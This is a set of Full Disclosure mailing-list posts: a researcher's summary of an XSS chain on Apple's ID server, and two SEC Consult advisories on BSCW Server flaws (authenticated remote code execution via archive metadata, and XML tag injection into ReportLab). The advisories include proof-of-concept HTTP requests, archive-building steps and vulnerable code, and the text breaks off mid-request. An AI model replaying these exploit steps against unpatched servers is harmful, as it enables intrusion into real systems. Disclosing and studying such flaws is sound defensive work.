[FD] XSS in Apple ID Server idmsa.apple.com
Hi seclists! I wanted to try posting some of my research here, and I think this is the right list. I recently published some research into Apple ID security that culminated in an XSS on the Apple ID server -- that is, an attacker can pop out an Apple login page that autofills your credentials and 2FA :) In particular, it has several really interesting components in the chain: - a Content Security Policy injection / bypass to slacken Javascript code execution and embed restrictions - bypass to postMessage restrictions on sending and receiving messages that uses some deep diving into the relevant spec - several bugs that involve interpretation malleability of URLs I was surprised to find out that postMessage's 'targetOrigin' parameter does not, as the spec describes, take a target origin, but actually a target *URL* which is then *parsed* to extract an origin. This means that, say 'https://nonsense:morenonse...@apple.com/somepath?nonsense#nonsense' as a *targetOrigin* will match 'https://apple.com'. The full write-up can be found here: https://zemnmez.medium.com/how-to-hack-apple-id-f3cc9b483a41 Thomas ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] SEC Consult SA-20210827-0 :: Authenticated RCE in BSCW Server
SEC Consult Vulnerability Lab Security Advisory < 20210827-0 >
===
title: Authenticated RCE
product: BSCW Server
vulnerable version: BSCW Server <=5.0.11, <=5.1.9, <=5.2.3, <=7.3.2, <=7.4.2
fixed version: 5.0.12, 5.1.10, 5.2.4, 7.3.3, 7.4.3
CVE number: CVE-2021-39271
impact: high
homepage: https://www.bscw.de/classic/
found: 2021-06-30
by: Armin Stock (Atos Germany)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos company
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"A versatile system for any field of application
BSCW Classic is in use around the world. With more than 500 functions, it
offers the right solution for every task. Turn your ideas into reality! Our
proven system has been supporting information flow and knowledge management at
numerous companies for more than 20 years."
Source: https://www.bscw.de/en/classic/
Business recommendation:
The vendor provides a patched version for the affected products which should
be installed immediately.
Vulnerability overview/description:
---
1) Authenticated RCE
The application allows a user with low privileges to upload different kind of
archives (`ZIP`, `tar`, `RFC822`) and extract them on the server. During the
extraction process a special file (`.bscw`) is processed to attach metadata to
the files created during extraction. This metadata file contains an attribute
(`class`), which is later used to instantiate a class/call a function to
create the desired object. As there is no allow-list implemented to limit
the class/function which can be called, it is possible to call an
arbitrary `Python` function. During the function call there are two
parameters provided, where the first is controlled by the attacker
(a element from the metadata file: `bscw:name`).
Proof of concept:
-
1) Authenticated RCE
The first step is to create an archive with a malicious `.bscw` file.
$ zip ../data.zip ./.bscw ./*
---
http://bscw.de/bscw/bscwarc.dtd;>
http://bscw.local; timestamp="20210630T123242Z"
pathsep="\\">
http://bscw.de/bscw/elements/0.1/doc/;
xmlns:bscw="http://bscw.de/bscw/elements/0.1/; >
HTML Document
CONTENT OF FIRST PARAMTER
---
Then the archive can be uploaded to a folder (OID: 267), where the user
has write access to:
---
PUT /sec/bscw.cgi/267/data.zip HTTP/1.1
Host: bscw.local:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/zip
Content-Length: 1559
DNT: 1
Connection: close
Cookie: bscw_auth=""
PK.
---
After uploading the archive the `extract` operation can be called for the new
created file object (OID: 1179):
---
GET /sec/bscw.cgi/267?op=extract=267_1179 HTTP/1.1
Host: bscw.local:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://bscw.local:8080/sec/bscw.cgi/267
Cookie: bscw_auth=""
Upgrade-Insecure-Requests: 1
---
During the extraction the function from the `class` attribute is located
and called.
---
# File: bs_extract.py
def createArtifact(self, request, tree, user, target=None):
"""create artifact for user and add to target
returns tuple (artifact, oldid) - or (None, None)
"""
#
# Locating the class/function
# klass = metadata 'class' attribute
klass_tuple = klass.split('.')
klass_name = klass_tuple[(-1)]
klass_modul = ('.').join(klass_tuple[:-1])
try:
modul = __import__('bscw').module(klass_modul)
except ImportError as ie:
log_arc.warning('ImportError: %s ', str(ie))
klass = 'bscw.core.cl_folder.Folder'
modul = None
if modul and hasattr(modul, klass_name):
cons
[FD] SEC Consult SA-20210827-1 :: XML Tag injection in BSCW Server
SEC Consult Vulnerability Lab Security Advisory < 20210827-1 > === title: XML Tag injection product: BSCW Server vulnerable version: BSCW Server <=5.0.11, <=5.1.9, <=5.2.3, <=7.3.2, <=7.4.2 fixed version: 5.0.12, 5.1.10, 5.2.4, 7.3.3, 7.4.3 CVE number: CVE-2021-36359 impact: high homepage: https://www.bscw.de/classic/ found: 2021-06-30 by: Armin Stock (Atos Germany) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "A versatile system for any field of application BSCW Classic is in use around the world. With more than 500 functions, it offers the right solution for every task. Turn your ideas into reality! Our proven system has been supporting information flow and knowledge management at numerous companies for more than 20 years." Source: https://www.bscw.de/en/classic/ Business recommendation: The vendor provides a patched version for the affected products, which should be installed immediately. Vulnerability overview/description: --- 1) XML Tag injection The application allows a user with low privileges to export different objects to a `PDF` file (`Send To -> File(PDF)`) via the `exportpdf` package. To export the content of the objects the framework ReportLab is used. This library supports different tags to export structured content: --- # File: reportlab/platypus/paraparser.py !!! NOTE !!! THIS TEXT IS NOW REPLICATED IN PARAGRAPH.PY !!! The ParaFormatter will be able to format the following tags: < /b > - bold < /i > - italics < u [color="red"] [width="pts"] [offset="pts"]> < /u > - underline width and offset can be empty meaning use existing canvas line width or with an f/F suffix regarded as a fraction of the font size < strike > < /strike > - strike through has the same parameters as underline < super [size="pts"] [rise="pts"]> < /super > - superscript < sup ="pts"] [rise="pts"]> < /sup > - superscript < sub ="pts"] [rise="pts"]> < /sub > - subscript < bullet > - bullet text (at head of para only) link text attributes of links size/fontSize/uwidth/uoffset=num name/face/fontName=name fg/textColor/color/ucolor=color backcolor/backColor/bgcolor=color dest/destination/target/href/link=target underline=bool turn on underline anchor text attributes of anchors fontSize=num fontName=name fg/textColor/color=color backcolor/backColor/bgcolor=color href=href width="w%" --> fontSize*w/100 idea from Roberto Alsina height="h%" --> linewidth*h/100 - ... turn off word breaking and hyphenation The whole may be surrounded by tags --- The application does not properly encode the user content before passing it to `ReportLab`, which allows the user to inject own tags. These tags get evaluated by the `ReportLab`. Depending on the version of `ReportLab` it allows the user to do a `SSRF` (server side request forgery) attack via the `img` tag (https://snyk.io/vuln/SNYK-PYTHON-REPORTLAB-1022145). There are also known vulnerabilites in `ReportLab`: * https://www.cybersecurity-help.cz/vdb/SB2019101613 * https://hg.reportlab.com/hg-public/reportlab/rev/b117091a73c2 This allows an attacker to execute `Python` code via the `unichar` tag or the `color` attribute. Proof of concept: - 1) XML Tag injection One possible injection point is the `description` of a folder. Using the following payload allows the execution of the `Python` code `28+20`. hello The result of this code is `48` (ASCII: `0`), which gets written to the generated `PDF` file. --- POST /sec/bscw.cgi/1917?op=_editfolder.EditFolder HTTP/1.1 Host: bscw.local:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,
